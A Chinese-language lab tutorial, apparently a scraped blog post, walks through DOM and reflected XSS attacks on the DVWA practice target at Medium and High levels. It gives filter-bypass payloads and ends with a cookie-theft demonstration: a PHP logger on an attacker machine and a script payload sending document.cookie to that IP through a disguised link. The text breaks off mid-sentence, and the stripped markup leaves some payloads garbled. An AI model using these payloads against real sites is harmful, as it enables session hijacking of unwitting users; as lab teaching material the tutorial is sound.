南昌定制网站开发费用,wordpress输出自定义文章类型内容,个人网站前置审批项,学习php好的网站本文仅作为学习参考使用#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
前言#xff1a;
1#xff0c;本文基于dvwa靶场以及PHP study进行操作#xff0c;靶场具体搭建参考上一篇#xff1a;
xss漏洞#xff08;二#xff0c;xss靶场搭建以及简单…本文仅作为学习参考使用本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
前言
1本文基于dvwa靶场以及PHP study进行操作靶场具体搭建参考上一篇
xss漏洞二xss靶场搭建以及简单利用
2设置靶场环境。
将靶场环境设置为Medium中等的并保存后续设置为High等级操作预期一致。
一Medium等级。
1查看源码。 可知,此处过滤script且select标签中只能含有optionoptgroup。
2测试注入点。 直接使用get传参可以使用hackbar来进行操作以避免url编码阻碍使用。 本来并不存在china选项但可以通过hackbar进行修改。
3开始利用。
http://dvwa:8003/vulnerabilities/xss_d/?default/option/selectimg src1 onErroralert(hello)
因为这个等级存在了过滤所以此处使用报错利用。
img标签是将一张图嵌入的意思src后跟所嵌入的图片地址onError后跟若前面的代码无法执行所进行的操作。
本段代码的整体含义为插入地址为1的图片若无法执行报错便执行弹窗为‘hello’的操作。此处可将hello更换为其他敏感信息以进行进一步利用。
二High等级。 直接使用Medium等级的思路是无法成功的本次便从白盒视角来进行解题。
白盒与黑盒
白盒是能在接触到源码的情况下进行的渗透活动能更好的找出漏洞所在。
黑盒是提供很少的条件辅助攻击有时甚至仅给一域名或ip最接近真实的网络攻击环境。 分析源码可知此处仅接受这四个值。
可以在注入的 payload 攻击载荷中加入注释符 “#”注释后边的内容不会发送到服务端但是会被前端代码所执行。
payload
http://dvwa:8003/vulnerabilities/xss_d/?defaultEnglish%20#%3Cscript%3Ealert(hello)%3C/script%3E 此处不知道为什么hackbar无法进行注入只好直接在url栏内进行修改传参。
三xss漏洞危害及利用。
1危害
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。
2实例
①攻击者在在攻击机网站目录下写cookie.php文件。 内容为
?php
$cookie$_GET[cookie];
file_put_contents(cookie.txt,$cookie);
?
②构造恶意语句,注入dvwa。
payload
scriptdocument.write(img srchttp:// 192.168.31.203/cookie.php?cookiedocument.cookie);/script
其中的 192.168.31.203为攻击机的IP。 ③开始攻击。
生成恶意链接,伪装之后给别人,让别人点击,前提是别人登录了dvwa.
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?namescriptdocument.write(img srchttp://192.168.31.203/cookie.php?cookiedocument.cookie);/script#
受害者点击后